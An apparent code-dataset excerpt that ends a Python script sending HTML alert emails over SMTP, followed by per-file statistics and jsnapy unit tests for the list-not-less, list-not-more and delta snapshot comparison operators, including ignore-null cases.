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" alt="Alert Platform" style="width:72px;height:72px;display:block;margin:auto"></a><br>'
default_body_foot = '<br><hr><div style="text-align:center"><p><strong>这是一封自动产生的邮件,<span style="color:#FF0000;">请勿回复</span>。</strong></p><p><strong>THIS IS AN AUTOMATED MESSAGE, PLEASE <span style="color:#FF0000;">DO NOT REPLY</span> TO THIS EMAIL.</strong></p><p style="font-size: 14px;"><strong>免责声明 | CONFIDENTIALITY NOTICE</strong></p></div><p>该电子邮件中的信息是保密的,除收件人外任何人无权访问此电子邮件。如果您不是收件人,请立即删除本邮件及附件;任何公开、复制、分发或基于此封邮件的行动,都是禁止的,并可能是违法的。</p><p>The contents of this email message and any attachments are intended solely for the addressee(s) and may contain confidential and/or privileged information and may be legally protected from disclosure. If you are not the intended recipient of this message or their agent, or if this message has been addressed to you in error, please immediately delete this message and any attachments. If you are not the intended recipient, you are hereby notified that any use, dissemination, copying, or storage of this message or its attachments is strictly prohibited.</p></div></div>'
msg.attach(MIMEText(default_body_head + base64_decode(body) + default_body_foot, 'html'))
server = smtplib.SMTP(smtp_server, smtp_port)
server.starttls()
# server = smtplib.SMTP_SSL(smtp_server + ":" + str(smtp_port)) # In case you need SSL/TLS auth.
server.login(user, email_password)
try:
msg['To'] = base64_decode(to)
text = msg.as_string()
server.sendmail(user, base64_decode(to), text, mail_options=['SMTPUTF8'])
except smtplib.SMTPNotSupportedError:
msg['To'] = punycode_converter(base64_decode(to))
text = msg.as_string()
server.sendmail(user, punycode_converter(base64_decode(to)), text)
server.quit()
send_email(sys.argv[1], sys.argv[2], sys.argv[3])
print("Success!", end ="")
| 353.175439
| 17,402
| 0.923302
| 1,091
| 20,131
| 17.006416
| 0.726856
| 0.00097
| 0.003018
| 0.003881
| 0.015091
| 0.015091
| 0.012288
| 0.008947
| 0.008947
| 0.008947
| 0
| 0.138669
| 0.022403
| 20,131
| 56
| 17,403
| 359.482143
| 0.804116
| 0.015548
| 0
| 0.051282
| 0
| 0.051282
| 0.932112
| 0.880476
| 0
| 1
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0.051282
| 0.179487
| 0
| 0.307692
| 0.025641
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
91e3efc012845ce83f11a4f6277528af2f7b6c43
| 26,435
|
py
|
Python
|
tests/unit/test_comparison_op.py
|
ntwrkguru/jsnapy
|
43a7b15743cc04135ab176179493248077ed98d3
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
tests/unit/test_comparison_op.py
|
ntwrkguru/jsnapy
|
43a7b15743cc04135ab176179493248077ed98d3
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
tests/unit/test_comparison_op.py
|
ntwrkguru/jsnapy
|
43a7b15743cc04135ab176179493248077ed98d3
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
import unittest
import yaml
from jnpr.jsnapy.check import Comparator
from mock import patch
from nose.plugins.attrib import attr
import os
@attr('unit')
class TestComparisonOperator(unittest.TestCase):
def setUp(self):
self.diff = False
self.hostname = "1.1.1.1"
self.db = dict()
self.db['store_in_sqlite'] = False
self.db['check_from_sqlite'] = False
self.db['db_name'] = "jbb.db"
self.db['first_snap_id'] = None
self.db['first_snap_id'] = None
self.snap_del = False
self.action = None
@patch('jnpr.jsnapy.check.get_path')
def test_list_not_less_fail(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_list-not-less.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_no-diff_pre",
self.action,
"snap_no-diff_post")
self.assertEqual(oper.no_passed, 1)
self.assertEqual(oper.no_failed, 1)
@patch('jnpr.jsnapy.check.get_path')
def test_list_not_less_ignore_null_fail(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_list-not-less_ignore-null_fail.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_no-diff_pre",
self.action,
"snap_no-diff_post")
self.assertEqual(oper.no_passed, 0)
self.assertEqual(oper.no_failed, 2)
@patch('jnpr.jsnapy.check.get_path')
def test_list_not_less_ignore_null_fail_1(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_list-not-less_ignore-null_fail_1.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_no-diff_pre",
self.action,
"snap_no-diff_post")
self.assertEqual(oper.no_passed, 1)#null case will pass
self.assertEqual(oper.no_failed, 1)
@patch('jnpr.jsnapy.check.get_path')
def test_list_not_less_ignore_null_skip(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_list-not-less_ignore-null_skip.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_no-diff_pre",
self.action,
"snap_no-diff_post")
self.assertEqual(oper.no_passed, 0)
self.assertEqual(oper.no_failed, 1)
@patch('jnpr.jsnapy.check.get_path')
def test_list_not_less_ignore_null_skip_1(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_list-not-less_ignore-null_skip_1.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_no-diff_pre",
self.action,
"snap_no-diff_post")
self.assertEqual(oper.no_passed, 1) # even if no nodes is found, comparison between null and null passes
self.assertEqual(oper.no_failed, 1)
@patch('jnpr.jsnapy.check.get_path')
def test_list_not_less_ignore_null_true_1(self, mock_path):
# Test to check if xml element not present in first snapshot and if ignore-NULL
# flag is set, it should ignore the test and move ahead.
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_list-not-less_ignore-null_skip_2.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_exists_pre",
self.action,
"snap_exists_post")
self.assertEqual(oper.no_passed, 0)
self.assertEqual(oper.no_failed, 0)
@patch('jnpr.jsnapy.check.get_path')
def test_list_not_less_ignore_null_true_2(self, mock_path):
#Test to check if xml element is present in first snapshot but not present in second snapshot and if ignore-NULL
#flag is set, it should return failure in the test
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_list-not-less_ignore-null_skip_2.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_exists_post",
self.action,
"snap_exists_pre")
self.assertEqual(oper.no_passed, 0)
self.assertEqual(oper.no_failed, 1)
@patch('jnpr.jsnapy.check.get_path')
def test_list_not_less_ignore_null_id_skip(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_list-not-less_ignore-null_id_skip.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_no-diff_pre",
self.action,
"snap_no-diff_post")
self.assertEqual(oper.no_passed, 0)
self.assertEqual(oper.no_failed, 0)
@patch('jnpr.jsnapy.check.get_path')
def test_list_not_less_pass(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_list-not-less.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_no-diff_pre",
self.action,
"snap_3")
self.assertEqual(oper.no_passed, 2)
self.assertEqual(oper.no_failed, 0)
@patch('jnpr.jsnapy.check.get_path')
def test_list_not_more_fail(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_list-not-more.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_no-diff_pre",
self.action,
"snap_no-diff_post")
self.assertEqual(oper.no_passed, 1)
self.assertEqual(oper.no_failed, 1)
@patch('jnpr.jsnapy.check.get_path')
def test_list_not_more_pass(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_list-not-more.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_no-diff_pre",
self.action,
"snap_3")
self.assertEqual(oper.no_passed, 2)
self.assertEqual(oper.no_failed, 0)
@patch('jnpr.jsnapy.check.get_path')
def test_list_not_more_ignore_null_fail(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_list-not-more_ignore-null_fail.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_no-diff_pre",
self.action,
"snap_3")
self.assertEqual(oper.no_passed, 0)
self.assertEqual(oper.no_failed, 2)
@patch('jnpr.jsnapy.check.get_path')
def test_list_not_more_ignore_null_fail_1(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_list-not-more_ignore-null_fail_1.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_no-diff_pre",
self.action,
"snap_3")
self.assertEqual(oper.no_passed, 2)#the name is kinda misleading but in line with the convention
self.assertEqual(oper.no_failed, 0)
@patch('jnpr.jsnapy.check.get_path')
def test_list_not_more_ignore_null_skip(self, mock_path):
# Test to check if xml element not present in second snapshot if ignore-NULL
# flag is set, it should ignore the test and move ahead.
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_list-not-more_ignore-null_skip.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_no-diff_pre",
self.action,
"snap_3")
self.assertEqual(oper.no_passed, 0)
self.assertEqual(oper.no_failed, 0)
@patch('jnpr.jsnapy.check.get_path')
def test_list_not_more_ignore_null_skip_2(self, mock_path):
#Test to check if xml element present in second snapshot but not present in second snapshot and if ignore-NULL
#flag is set, it should return failure.
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_list-not-more_ignore-null_skip_2.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_exists_pre",
self.action,
"snap_exists_post")
self.assertEqual(oper.no_passed, 0)
self.assertEqual(oper.no_failed, 1)
@patch('jnpr.jsnapy.check.get_path')
def test_list_not_more_ignore_null_skip_1(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_list-not-more_ignore-null_skip_1.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_no-diff_pre",
self.action,
"snap_3")
self.assertEqual(oper.no_passed, 2)
self.assertEqual(oper.no_failed, 0)
@patch('jnpr.jsnapy.check.get_path')
def test_list_not_more_ignore_null_id_skip(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_list-not-more_ignore-null_id_skip.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_no-diff_pre",
self.action,
"snap_3")
self.assertEqual(oper.no_passed, 0)
self.assertEqual(oper.no_failed, 0)
@patch('jnpr.jsnapy.check.get_path')
def test_delta(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_delta.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_delta_pre",
self.action,
"snap_delta_post")
self.assertEqual(oper.no_passed, 1)
self.assertEqual(oper.no_failed, 0)
@patch('jnpr.jsnapy.check.get_path')
def test_delta_ignore_null_fail(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_delta_ignore-null_fail.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_delta_pre",
self.action,
"snap_delta_post")
self.assertEqual(oper.no_passed, 0)
self.assertEqual(oper.no_failed, 1)
@patch('jnpr.jsnapy.check.get_path')
def test_delta_ignore_null_fail_1(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_delta_ignore-null_fail_1.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_delta_pre",
self.action,
"snap_delta_post")
self.assertEqual(oper.no_passed, 0)
self.assertEqual(oper.no_failed, 1)
@patch('jnpr.jsnapy.check.get_path')
